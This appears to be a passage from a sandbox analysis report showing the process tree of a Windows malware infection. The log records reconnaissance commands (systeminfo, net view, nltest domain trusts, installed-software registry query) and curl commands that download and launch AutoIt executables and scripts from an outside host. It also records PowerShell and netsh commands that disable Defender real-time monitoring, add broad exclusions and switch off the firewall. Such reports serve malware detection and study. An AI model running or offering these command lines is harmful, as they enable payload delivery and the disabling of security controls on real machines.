- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5004 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2144
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"2⤵PID:3132
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1952
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"2⤵PID:3720
-
-
C:\Windows\system32\cmd.execmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4948
-
C:\Windows\system32\systeminfo.exesysteminfo.exe3⤵
- Gathers system information
PID:4444
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:2372
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4540
-
-
C:\Windows\system32\cmd.execmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:1436
-
C:\Windows\system32\net.exenet view3⤵
- Discovers systems in the same network
PID:4528
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:2500
-
-
C:\Windows\system32\cmd.execmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:756
-
C:\Windows\system32\nslookup.exenslookup 127.0.0.13⤵PID:4892
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4580
-
-
C:\Windows\system32\cmd.execmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4708
-
C:\Windows\system32\tasklist.exetasklist.exe /SVC3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4272
-
-
C:\Windows\system32\cmd.execmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4360
-
C:\Windows\system32\driverquery.exedriverquery.exe3⤵PID:556
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4500
-
-
C:\Windows\system32\cmd.execmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:2884
-
C:\Windows\system32\reg.exereg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s3⤵PID:3832
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:3312
-
-
C:\Windows\system32\cmd.execmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4020
-
C:\Windows\system32\net.exenet config workstation3⤵PID:2768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 config workstation4⤵PID:4036
-
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4616
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4404
-
C:\Windows\system32\nltest.exenltest /domain_trusts3⤵PID:4244
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:640
-
-
C:\Windows\system32\cmd.execmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:2396
-
C:\Windows\system32\nltest.exenltest /domain_trusts /all_trusts3⤵PID:5052
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:3020
-
-
C:\Windows\system32\cmd.execmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:3976
-
C:\Windows\system32\net.exenet view /all /domain3⤵
- Discovers systems in the same network
PID:3288
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:548
-
-
C:\Windows\system32\cmd.execmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4876
-
C:\Windows\system32\net.exenet view /all3⤵
- Discovers systems in the same network
PID:3692
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4332
-
-
C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\58E.bin1 > C:\Users\Admin\AppData\Local\Temp\58E.bin & del C:\Users\Admin\AppData\Local\Temp\58E.bin1"2⤵PID:4348
-
-
C:\Users\Admin\AppData\Roaming\EdgeData\A.exeC:\Users\Admin\AppData\Roaming\EdgeData\A.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\system32\curl.execurl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe3⤵PID:960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\curl.execurl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe3⤵PID:3948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au32⤵
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\curl.execurl http://sincheats.com/gas/12/WD.au3 --output WD.au33⤵PID:3608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au32⤵
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exeAutoIt3.exe WD.au33⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵PID:3608
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au32⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\system32\curl.execurl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au33⤵PID:1060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au32⤵
- Suspicious use of WriteProcessMemory
PID:484 -
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exeC:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au33⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:620
-
-
-